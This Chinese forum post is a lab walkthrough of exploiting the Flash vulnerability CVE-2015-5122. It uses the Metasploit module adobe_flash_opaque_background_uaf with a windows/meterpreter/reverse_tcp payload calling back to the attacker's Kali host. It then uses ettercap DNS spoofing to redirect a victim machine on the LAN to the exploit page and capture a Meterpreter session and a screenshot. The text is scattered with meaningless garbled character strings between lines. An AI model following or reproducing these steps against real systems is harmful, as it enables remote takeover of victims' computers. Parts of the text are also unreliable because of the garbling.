二、cve2015-5122漏洞实例演示虚拟机
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
) ]; W. m1 ^( y7 L% ?8 l- |1 S search cve-2015-5122如图:
5 j$ T, O: e) K- j' u: l" q( ]& N. T' \+ L
下面我们敲如下命令:
. t. T9 ~$ g. w1 P' @ T use exploit/multi/browser/adobe_flash_opaque_background_uaf
# {) x, I( x/ n( {9 R set PAYLOAD windows/meterpreter/reverse_tcp - P' h6 X" f2 ~* E8 u1 E
$ m/ j/ _; p: Lset LHOST 192.168.0.109 2 g/ A# c& m8 C4 p1 s5 U
# ?) L0 H5 O2 Rset URIPATH / /*根目录*/
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
8 D( T8 r, _4 |set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
8 q* T. H! Q' _7 T 然后show options如图: 9 L! I8 q9 Z. q, o* H$ N5 U
8 y7 U2 _4 \* m* ]+ O
* A3 g, A+ I' @/ w6 p
3 R, B" ~4 K" B5 S6 K" ]
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
. ~1 z3 C4 ]" r; k/ ~) O! g0 B4 e0 v
, k3 D/ v1 S' x7 B
( }& F5 z* O" R& `3 H
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 * [* k2 I, l6 ~' r p6 ?
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
" D% F& k) q9 v& ]/ R4 B
成功了,这时候我们断开ettercap,如图:
* {4 O& [. h4 u. A2 w% M6 J
9 X1 N% H' x C9 L( j# L B8 A
$ N1 |1 }0 x' O, q" W* n6 \ Screenshot如图: 5 G- x: o+ e3 r
; m" s1 m7 c9 T) W. i# P6 m
! R' x0 j1 v, ~: [, ~
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |